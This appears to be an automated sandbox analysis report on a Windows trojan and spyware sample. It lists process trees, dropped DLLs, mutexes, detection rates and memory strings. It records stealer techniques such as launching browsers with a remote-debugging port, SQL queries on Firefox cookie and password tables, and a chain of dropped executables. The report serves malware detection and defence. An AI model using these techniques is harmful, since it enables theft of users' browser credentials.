Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD4840	0_2_6CAD4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA909A0	0_2_6CA909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA9A0	0_2_6CABA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC09B0	0_2_6CAC09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB1C9E0	0_2_6CB1C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA349F0	0_2_6CA349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA56900	0_2_6CA56900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA38960	0_2_6CA38960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7EA80	0_2_6CA7EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB8A30	0_2_6CAB8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAAEA00	0_2_6CAAEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA7CA70	0_2_6CA7CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0BA0	0_2_6CAA0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB06BE0	0_2_6CB06BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2A480	0_2_6CB2A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA464D0	0_2_6CA464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9A4D0	0_2_6CA9A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA64420	0_2_6CA64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8A430	0_2_6CA8A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA18460	0_2_6CA18460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F45B0	0_2_6C9F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACA5E0	0_2_6CACA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8E5F0	0_2_6CA8E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA62560	0_2_6CA62560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0570	0_2_6CAA0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48550	0_2_6CB48550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA58540	0_2_6CA58540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB04540	0_2_6CB04540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5E6E0	0_2_6CA5E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9E6E0	0_2_6CA9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA246D0	0_2_6CA246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5C650	0_2_6CA5C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA2A7D0	0_2_6CA2A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA80700	0_2_6CA80700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F8090	0_2_6C9F8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA100B0	0_2_6CA100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADC0B0	0_2_6CADC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACC000	0_2_6CACC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC8010	0_2_6CAC8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA4E070	0_2_6CA4E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA001E0	0_2_6CA001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA76130	0_2_6CA76130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE4130	0_2_6CAE4130
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_008178BB	20_2_008178BB
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_00817049	20_2_00817049
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_00818860	20_2_00818860
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_008131A8	20_2_008131A8
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_007D4B30	20_2_007D4B30
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_008E7B6E	20_2_008E7B6E
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_00812D10	20_2_00812D10
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_007D4DE0	20_2_007D4DE0
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_0081779B	20_2_0081779B
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_00807F36	20_2_00807F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B478BB	21_2_00B478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B48860	21_2_00B48860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B47049	21_2_00B47049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B431A8	21_2_00B431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B04B30	21_2_00B04B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B04DE0	21_2_00B04DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B42D10	21_2_00B42D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B4779B	21_2_00B4779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B37F36	21_2_00B37F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B0E530	23_2_00B0E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B26192	23_2_00B26192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B48860	23_2_00B48860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B04B30	23_2_00B04B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B04DE0	23_2_00B04DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B42D10	23_2_00B42D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B20E13	23_2_00B20E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B47049	23_2_00B47049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B431A8	23_2_00B431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B21602	23_2_00B21602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B4779B	23_2_00B4779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B478BB	23_2_00B478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B23DF1	23_2_00B23DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B37F36	23_2_00B37F36

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B180C0 appears 261 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B38E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B1DF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B1D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B1D942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B17A00 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00B1D64E appears 66 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA29B10 appears 42 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB8D930 appears 37 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB8DAE0 appears 46 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9994D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C98CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CB809D0 appears 196 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CA23620 appears 51 times
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: String function: 007E80C0 appears 130 times

Source: file.exe, 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2748285132.00000000230D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2757414121.000000006CBD5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/55@8/11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C9B7030

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\VKMLM9WX.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;h
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2341450911.000000001CF85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2478950163.000000001CFA0000.00000004.00000020.00020000.00000000.sdmp, HCAFIJDGHCBFHJKFCGIE.0.dr, HDAKFCGIJKJKFHIDHIII.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2753596728.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 49%

Source: DGCAAFBFBK.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: =RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2172,i,17693592951107771680,17343620240284749049,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2084,i,17208139425512055275,10975637639687312567,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2060,i,12344348702254346742,4398189957191153386,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DGCAAFBFBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DGCAAFBFBK.exe "C:\Users\user\Documents\DGCAAFBFBK.exe"
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe "C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DGCAAFBFBK.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2172,i,17693592951107771680,17343620240284749049,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2084,i,17208139425512055275,10975637639687312567,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2060,i,12344348702254346742,4398189957191153386,262144 /prefetch:3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DGCAAFBFBK.exe "C:\Users\user\Documents\DGCAAFBFBK.exe"	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe "C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
